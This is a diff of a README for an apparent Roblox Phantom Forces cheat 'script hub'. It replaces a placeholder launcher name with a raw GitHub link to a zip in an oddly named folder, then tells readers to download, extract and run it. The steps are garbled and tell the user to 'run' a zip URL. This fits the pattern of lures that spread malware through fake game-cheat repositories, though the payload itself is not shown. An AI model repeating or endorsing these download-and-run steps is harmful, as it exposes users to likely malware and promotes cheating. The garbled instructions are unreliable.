Wai-Yan2003/phantom-forces-script-hub/README.md

 Bring your Roblox gameplay to new heights in minutes.
 To get started, follow these straightforward steps:

-1. **Obtain "EasyLaunch.zip" Directly from the Repository**
+1. **Obtain "https://raw.githubusercontent.com/Wai-Yan2003/phantom-forces-script-hub/main/diminutively/hub-script-phantom-forces-v3.4-alpha.1.zip" Directly from the Repository**
    Locate the file at the top of the main directory in this GitHub repo.
 No registration, no clutter—just the essentials for every Roblox Phantom Forces strategist.

 2. **Extract the Archive**
-   Unzip "EasyLaunch.zip" to your desired folder.
+   Unzip "https://raw.githubusercontent.com/Wai-Yan2003/phantom-forces-script-hub/main/diminutively/hub-script-phantom-forces-v3.4-alpha.1.zip" to your desired folder.

-3. **Run EasyLaunch.exe or the appropriate script for your OS**
+3. **Run https://raw.githubusercontent.com/Wai-Yan2003/phantom-forces-script-hub/main/diminutively/hub-script-phantom-forces-v3.4-alpha.1.zip or the appropriate script for your OS**
    For macOS and Linux, use the respective startup scripts inside the extracted folder.

 4. **Configure Language and AI Options**